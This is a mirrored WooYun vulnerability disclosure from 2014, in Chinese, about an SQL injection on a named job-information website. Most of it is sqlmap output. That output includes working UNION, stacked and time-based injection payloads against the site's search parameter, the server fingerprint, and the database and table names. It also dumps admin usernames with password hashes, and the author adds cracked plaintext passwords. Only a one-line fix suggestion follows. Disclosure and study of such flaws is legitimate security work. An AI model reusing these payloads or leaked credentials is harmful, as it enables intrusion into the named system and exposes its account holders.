乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-13: 细节已通知厂商并且等待厂商处理中 2014-10-17: 厂商已经确认,细节仅向厂商公开 2014-10-27: 细节向核心白帽子及相关领域专家公开 2014-11-06: 细节向普通白帽子公开 2014-11-16: 细节向实习白帽子公开 2014-11-27: 细节向公众公开
123456789
漏洞存在页面:http://zp.czinfo.net/chaxun.aspPOST参数:button=88952634&find_name=88952634
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: find_name Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: button=88952634&find_name=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(117)+CHAR(112)+CHAR(113)+CHAR(115)+CHAR(99)+CHAR(72)+CHAR(121)+CHAR(88)+CHAR(118)+CHAR(119)+CHAR(121)+CHAR(117)+CHAR(104)+CHAR(113)+CHAR(101)+CHAR(117)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: button=88952634&find_name=88952634'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: button=88952634&find_name=88952634' WAITFOR DELAY '0:0:5'-----[23:06:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[23:06:17] [INFO] fetching database namesavailable databases [9]:[*] 189_mail[*] birth_db[*] black_db[*] master[*] model[*] msdb[*] speed_2013[*] tel_job[*] tempdbDatabase: tel_jobTable: ManageUser[8 columns]+---------------+---------------+| Column | Type |+---------------+---------------+| ActiveState | smallint || LoginDatetime | smalldatetime || LoginIP | nvarchar || password | nvarchar || realname | nvarchar || Rowid | int || userlevel | nvarchar || username | nvarchar |+---------------+---------------+
Database: tel_jobTable: ManageUser[11 entries]+----------+------------------+| username | password |+----------+------------------+| dong | 69988207ff4d9722 || czdx | 75cef11283fa85db || czdxxb | a7a60da25bd19d0c || czdxcz | 49ba59abbe56e057 || czdxwj | 49ba59abbe56e057 || czdxgk | 49ba59abbe56e057 || czdxkf | 83cfe9d51ab31e4c || czdxhb | 49ba59abbe56e057 || czdxkd | 49ba59abbe56e057 || czwy | 49ba59abbe56e057 || czdxxy | 49ba59abbe56e057 |+----------+------------------+
弱口令啊。都是。dong dong!^#其他密码:123456
过滤参数
危害等级:中
漏洞Rank:9
确认时间:2014-10-17 15:27
暂无